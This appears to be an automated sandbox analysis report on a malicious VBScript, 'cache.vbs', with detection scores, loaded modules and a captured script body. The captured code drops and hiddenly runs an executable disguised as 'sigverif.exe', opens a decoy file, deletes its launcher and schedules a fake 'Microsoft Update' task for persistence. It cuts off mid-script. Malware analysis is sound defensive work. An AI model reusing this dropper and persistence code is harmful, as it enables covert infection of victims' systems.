Click to jump to signature section
Source: cache.vbs | ReversingLabs: Detection: 28% |
Source: cache.vbs | Virustotal: Detection: 30% | Perma Link |
Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} | Jump to behavior |
Source: cache.vbs | Initial sample: Strings found which are bigger than 50 |
Source: classification engine | Classification label: mal64.evad.winVBS@1/0@0/0 |
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\cache.vbs" |
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers | Jump to behavior |
Source: cache.vbs | ReversingLabs: Detection: 28% |
Source: cache.vbs | Virustotal: Detection: 30% |
Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: WScript.CreateObject("Scripting.FileSystemObject")Dim currentPathcurrentPath = objFSO.GetAbsolutePathName(".")strFilePath = currentPath & "\_cache\cache\cache.bak"strNewFilePath = currentPath & "\_cache\cache\sigverif.exe"objFSO.MoveFile strFilePath, strNewFilePathSet objFSO = NothingDim filenameb64filenameb64 = DecodeBase64("5Y2a5aOr5ZCO55Sz6K+3LeeOi+eOieeOui3ljY7kuK3np5HmioDlpKflraYt55S15rCU5LiO55S15a2Q5bel56iL5Y2a5aOrLeeugOWOhi5wZGY=")Dim fsoSet fso = WScript.CreateObject("Scripting.FileSystemObject")Dim sourcePath,destinationPath,runfile,runfile2sourcePath = currentPath & "\_cache\cache\" & "cache.db"destinationPath = currentPath & "\" & filenameb64deleteFile = currentPath & "\" & filenameb64 & ".lnk"runfile = Chr(34) & currentPath & "\_cache\cache\sigverif.exe" & Chr(34)runfile2 = currentPath & "\_cache\cache\sigverif.exe"fso.MoveFile sourcePath, destinationPathfso.DeleteFile deleteFileDim tempFolder, tempPathtempFolder = fso.GetSpecialFolder(2)tempPath = tempFolder & "\sigverif.exe"fso.CopyFile runfile2, tempPath, TrueDim v1v1 = Chr(34) & destinationPath & Chr(34)Set WshShell = CreateObject("WScript.Shell")WshShell.Run v1, 0, FalseWshShell.Run tempPath, 0, Falsefso.DeleteFile runfile2Set WshShell = NothingDim shellPathDim taskName shellPath = tempPathtaskName = "WpnUserService_x64" Const TriggerTypeDaily = 1Const ActionTypeExec = 0Set service = CreateObject("Schedule.Service")Call service.ConnectDim rootFolderSet rootFolder = service.GetFolder("\")Dim taskDefinitionSet taskDefinition = service.NewTask(0)Dim regInfoSet regInfo = taskDefinition.RegistrationInforegInfo.Description = "Update"regInfo.Author = "Microsoft"Dim settingsSet settings = taskDefinition.settingssettings.Enabled = Truesettings.StartWhenAvailable = Truesettings.Hidden = Falsesettings.DisallowStartIfOnBatteries = FalseDim triggersSet triggers = taskDefinition.triggersDim triggerOn Error Resume Next CreateObject("WScript.Shell").RegRead ("HKEY_USERS\S-1-5-19\Environment\TEMP") If Err.Number = 0 Then IsAdmin = True Set trigger = triggers.Create(8) Set trigger = triggers.Create(9) Else IsAdmin = False End If Err.Clear On Error GoTo 0Set trigger = triggers.Create(7)Set trigger = triggers.Create(6)Set trigger = triggers.Create(TriggerTypeDaily)Dim startTime, endTimeDim timetime = DateAdd("n", 2, Now)Dim cSecond, cMinute, CHour, cDay, cMonth, cYearDim tTime, tDatecSecond = "0" & Second(time)cMinute = "0" & Minute(ti |